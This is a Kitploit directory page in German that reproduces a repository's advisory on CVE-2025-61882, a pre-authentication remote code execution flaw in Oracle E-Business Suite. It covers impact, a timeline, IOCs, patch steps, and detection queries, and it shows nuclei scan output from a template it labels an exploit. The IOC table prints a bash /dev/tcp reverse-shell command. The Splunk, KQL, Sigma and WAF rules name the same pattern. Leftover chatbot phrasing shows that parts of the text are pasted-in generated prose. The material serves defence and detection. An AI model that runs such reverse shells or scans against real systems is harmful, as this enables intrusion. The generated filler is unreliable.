Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Blackash-CVE-2025-61882 — Bietet ein detailliertes CVE-2025-61882-Advisory mit technischer Analyse, IOCs, Erkennungsabfragen und einer nuclei-basierten Exploit-Vorlage für die Pre-Auth-RCE in Oracle E-Business Suite. | Kitploit
Tools/GitHubGitHub/222dff-afk/blackash-cve-2025-61882
SchwachstellenanalyseExploitationWebsicherheitPenetrationstestsBedrohungsanalyseIncident Response
GitHub222dff-afk/blackash-cve-2025-61882

Blackash-CVE-2025-61882

Bietet ein detailliertes CVE-2025-61882-Advisory mit technischer Analyse, IOCs, Erkennungsabfragen und einer nuclei-basierten Exploit-Vorlage für die Pre-Auth-RCE in Oracle E-Business Suite.

Repository anzeigen
2vor 10 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

🛡️🚨 CVE‑2025‑61882 — Kritische Pre‑Auth Remote Code Execution in Oracle E‑Business Suite (EBS) 🚨🛡️

Kurzzusammenfassung: Kritische Pre‑Auth Remote Code Execution in Oracle E‑Business Suite (EBS) — betrifft 12.2.3 → 12.2.14, CVSS 9.8, aktiv in freier Wildbahn ausgenutzt (Ransom-/Erpressungsaktivitäten gemeldet). ([oracle.com][1])


📌 Kurzfakten (Tabelle)

FeldDetails
🆔 CVECVE‑2025‑61882
🧾 Produkt / KomponenteOracle E‑Business Suite (EBS) — Concurrent Processing / BI Publisher Integration
📦 Betroffene Versionen12.2.3 → 12.2.14
🔢 CVSS (v3.1)9.8 (AV:N/AC:L/PR:N/UI:N/C:H/I:H/A:H)
⚠️ TypRemote Code Execution (RCE) — keine Authentifizierung erforderlich
🔥 In freier Wildbahn ausgenutztJa — Massenausnutzung / Erpressungskampagnen gemeldet
📅 Offenlegung / ZeitplanOktober 2025 (Herstellerhinweis + öffentliche Writeups). ([oracle.com][1])

(Oben konsolidiert aus Herstellerhinweis, NVD/CISA und mehreren Herstelleranalysen.) ([oracle.com][1])


💥 Auswirkungen (Tabelle)

AuswirkungsbereichWas es bedeutet
🔓 VertraulichkeitAngreifer können sensible HR-/Finanz-/ERP-Daten lesen
🛠️ IntegritätAngreifer können Datensätze ändern, Backdoors erstellen oder Konfigurationen verändern
⚡ VerfügbarkeitAngreifer können Dienste stören, Ransomware ausführen oder Backups zerstören
🧭 RisikostufeExtrem — Pre‑Auth RCE auf kritischem ERP-System → mögliche vollständige Domain-Übernahme

Referenzen, die hochriskante Ausnutzung und Ransomware-Verbindungen melden. ([Rapid7][2])


🛠️ Technische Zusammenfassung (prägnant)

  • Vektor: HTTP/HTTPS-Anfragen an exponierte EBS-Web-Endpunkte lösen eine Schwachstellenkette in der Concurrent Processing / BI Publisher Integration aus, die zu Remote Code Execution führt. ([oracle.com][1])
  • Komplexität: Niedrig (keine Authentifizierung, keine Benutzerinteraktion). ([nvd.nist.gov][3])
  • Beobachtete Payloads: Reverse-Shell-Muster, Web-Shells, abgelegte Skripte für Datenerfassung und Erpressung. ([Rapid7][2])

🕵️‍♀️ Indicators of Compromise (IOCs) — Beispiele (Tabelle)

Oracle und Incident-Responder haben IOCs veröffentlicht; unten sind repräsentative Beispiele aus Hinweisen und Hersteller-Writeups. Suchen Sie in Logs und Endpunkten nach diesen Mustern. ([oracle.com][1])

TypBeispiel
🌐 IPs (beobachtet)200.107.207.26, 185.181.60.11 (beispielhafte gemeldete Adressen)
🧾 Befehlsmustersh -c /bin/bash -i >& /dev/tcp/<ip>/<port> 0>&1 (Reverse Shell)
🗂️ Datei-HashesMehrere SHA‑256-Hashes für vermutete Exploit-Skripte (vollständige Liste im Herstellerhinweis)
🕳️ ArtefakteUnerwartete Web-Shells, neue Cronjobs, verdächtige ausgehende Verbindungen zu ungewöhnlichen IPs/Ports

Wenn Sie die vollständige IOC-Liste (IPs, vollständige Hashes, Dateinamen) möchten, kann ich sie hier einfügen — sagen Sie „IOCs einfügen“. (Keine Links.)


🧭 Zeitplan (kompakt)

DatumEreignis
9. Aug. 2025Früheste gemeldete reale Ausnutzungsaktivität (Hersteller-Telemetrie). ([crowdstrike.com][4])
Anfang Okt. 2025Oracle hat Sicherheitshinweis / Patch-Verfügbarkeit für EBS herausgegeben. ([oracle.com][1])
6.–7. Okt. 2025CISA hat die CVE in ihren Katalog bekannter ausgenutzter Schwachstellen (KEV) aufgenommen (Leitfaden für Bundesbehörden, Frist für Maßnahmen). ([cisa.gov][5])
Okt. 2025 (laufend)Mehrere Hersteller-Writeups und Massenexploit-Berichte (CrowdStrike, Rapid7, Tenable usw.). ([crowdstrike.com][4])

✅ Sofort empfohlene Maßnahmen (Schritt-Tabelle)

PrioritätAktionHinweise / Beispiel-Details
1️⃣ KritischPatchen betroffener EBS-InstanzenOracle-Sicherheitshinweis-Patches für Versionen 12.2.3–12.2.14 sofort anwenden. ([oracle.com][1])
2️⃣ HochIsolieren / Einschränken des Zugriffs auf EBS-Web-EndpunkteInternetzugängliches HTTP/HTTPS zu EBS blockieren; nur vertrauenswürdige Admin-IPs oder VPN zulassen.
3️⃣ HochWAF-Regeln aktivieren/anpassenHersteller-/Community-WAF-Signaturen für die Exploit-Muster bereitstellen; verdächtige Payloads blockieren. ([Rapid7][2])
4️⃣ HochJagen & erkennenLogs nach Reverse-Shell-Befehlen, abnormalen Dateischreibvorgängen und ausgehenden Verbindungen zu IOCs durchsuchen.
5️⃣ VorfallEindämmen & reagieren, wenn Kompromittierung gefundenHost isolieren, forensische Beweise sichern, Zugangsdaten ändern, aus sauberen Backups neu aufbauen.
6️⃣ RichtlinieMelden & benachrichtigenWenn regulatorische/vertragliche Anforderungen gelten, Interessengruppen und Behörden gemäß Richtlinie benachrichtigen (CISA/KEV-Leitfaden kann gelten). ([nvd.nist.gov][3])

💀 Exploits :

root@kitploit:~
┌──(kali㉿kali)-[~]
└─$ nuclei -u http://10.10.10.10:8000 -t CVE-2025-61882.yaml                                                                                                  

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.10

                projectdiscovery.io

[INF] Current nuclei version: v3.4.10 (latest)
[INF] Current nuclei-templates version: v10.2.9 (latest)
[INF] New templates added in latest release: 182
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Wed, 20 Aug 2025 08:20:09 GMT"]
[INF] Scan completed in 485.722955ms. 1 matches found.
                                                                                                                                                                                                                                           
┌──(kali㉿kali)-[~]
└─$ nuclei -l targets.txt -t CVE-2025-61882.yaml                        

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.10

                projectdiscovery.io

[INF] Current nuclei version: v3.4.10 (latest)
[INF] Current nuclei-templates version: v10.2.9 (latest)
[INF] New templates added in latest release: 182
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 7
[INF] Running httpx on input host
[INF] Found 7 URL from httpx
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Mon, 02 Oct 2023 13:57:20 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Wed, 20 Aug 2025 08:20:09 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Sat, 31 Aug 2024 15:30:07 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Tue, 15 Aug 2023 16:58:09 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Fri, 30 Aug 2024 21:49:46 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Sun, 16 May 2021 17:03:44 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http:/10.10.10.10:8000 ["Fri, 01 Sep 2023 13:20:35 GMT"]
[INF] Scan completed in 621.029991ms. 7 matches found.
CVE-2025-61882 Oracle E-Business Suite 1
CVE-2025-61882 Oracle E-Business Suite 4

🕵️‍♂️ Beispiel-Erkennungsabfragen (kopier-/einfügbar)

Splunk (Suche nach Reverse-Shell-Muster):

root@kitploit:~
index=web OR index=ebs_logs (uri_path="/cgi/*" OR uri_path="/xmlpserver/*") 
| search "* /bin/bash -i * /dev/tcp/*" OR "*/dev/tcp/* 0>&1*"
| table _time host src_ip user uri_path _raw

ELK / Kibana (KQL):

root@kitploit:~
http.request.body : "*bash -i*" or http.request.body : "* /dev/tcp/*"

Sigma-Regel (konzeptionell):

root@kitploit:~
title: Oracle EBS Reverse Shell via HTTP
detection:
  selection:
    EventID: 1234
    ProcessCommandLine|contains: "/dev/tcp/"
  condition: selection

(Feldnamen an Ihr Log-Schema anpassen; IOCs zur Verfeinerung verwenden.)


🔐 Beispiel-Firewall-/WAF-Maßnahmen (Beispiele)

  • Netzwerk-ACL: Eingehenden 80/443-Verkehr zu EBS-Servern aus dem öffentlichen Internet blockieren; nur Management-VPN und bestimmte Admin-IPs zulassen.
  • WAF-Regel (Pseudo): Anfragen blockieren, die bash -i, /dev/tcp/, base64 -d oder typische Exploit-Payload-Muster in POST-Bodys oder URL-Parametern enthalten.
  • Ratenbegrenzung / Geo-Block: Anfragen an EBS-Endpunkte vorübergehend ratenbegrenzen und Verkehr aus bekannten bösartigen Regionen blockieren, wenn dies mit Geschäftsanforderungen vereinbar ist.

🧾 Patch-Checkliste (kurz)

  1. Backups erstellen & VM-Images sichern ✅
  2. Patch im Staging testen (falls möglich) ✅
  3. Oracle-Sicherheitshinweis-Patch auf EBS 12.2.3–12.2.14 anwenden ✅ (Herstellerschritte befolgen: Dienste stoppen, Patch anwenden, Post-Installationsaufgaben ausführen) ([oracle.com][1])
  4. Neustart und Dienstintegrität validieren ✅
  5. Erneut auf Kompromittierungsartefakte scannen und vollständige Host-Forensik-Prüfungen durchführen ✅

🧠 Bedrohungsakteur-/Exploit-Anmerkungen

  • Mehrere Hersteller führen aktive Ausnutzung auf Gruppen zurück, die mit Erpressung/Ransomware verbunden sind (z. B. Cl0p / Graceful Spider oder verwandte Akteure) — verwendet für Datendiebstahl und Erpressung. Die Zuordnungssicherheit variiert je nach Hersteller. ([crowdstrike.com][4])

📋 Für SOC-/IR-Teams — Playbook-Checkliste

  • Triage: Eingehender Exploit-Versuch? HTTP-Anfrage, Header, POST-Body erfassen.
  • Eindämmen: Betroffenen Host vom Netzwerk isolieren.
  • Forensik: Speicher, Festplatten-Image, Webserver-Logs, Audit-Logs sammeln.
  • Beheben: Host aus sauberem Image neu aufbauen, wenn Kompromittierung bestätigt.
  • Wiederherstellung: Aus bekannten guten Backups wiederherstellen; Zugangsdaten rotieren.
  • Melden: Vorfall protokollieren, Interessengruppen benachrichtigen, KEV/CISA-Leitfaden einhalten, falls anwendbar. ([nvd.nist.gov][3])

🔎 Quellen (kurze Liste autoritativer Berichte)

(Ich liste Quellen für Genauigkeit — ich füge hier keine Links ein, aber dies sind die Hersteller-/Behördennamen, auf die Sie bei Bedarf verweisen können.)

  • Oracle-Sicherheitshinweis / Patch-Verfügbarkeit (Herstellerhinweis). ([oracle.com][1])
  • NVD / CISA (CISA-KEV-Katalogeintrag und NVD-Metadaten). ([nvd.nist.gov][3])
  • CrowdStrike-Technischer Bericht über Kampagnen. ([crowdstrike.com][4])
  • Rapid7 / Tenable / andere Herstelleranalysen und FAQs. ([Rapid7][2])

Hier ist ein professioneller, emoji-reicher Haftungsausschluss, den Sie für Ihren CVE‑2025‑61882-Bericht verwenden können:


⚠️💀 Haftungsausschluss 💀⚠️

Die in diesem Bericht bereitgestellten Informationen dienen nur der Sensibilisierung, Verteidigung und Bildung. Die Verwendung dieser Informationen zum Ausnutzen, Angreifen oder Kompromittieren eines Systems ohne ausdrückliche Genehmigung ist illegal und kann zu straf- und zivilrechtlichen Sanktionen führen.

🔒 Wenden Sie immer empfohlene Patches an, befolgen Sie Sicherheits-Best-Practices und führen Sie Tests nur in kontrollierten Umgebungen durch.

🧾 Dieser Bericht ersetzt keine offiziellen Herstellerhinweise — konsultieren Sie immer Oracle-Sicherheitshinweise und autorisierte Anleitungen für verbindliche Behebungsanweisungen.


Tool herunterladen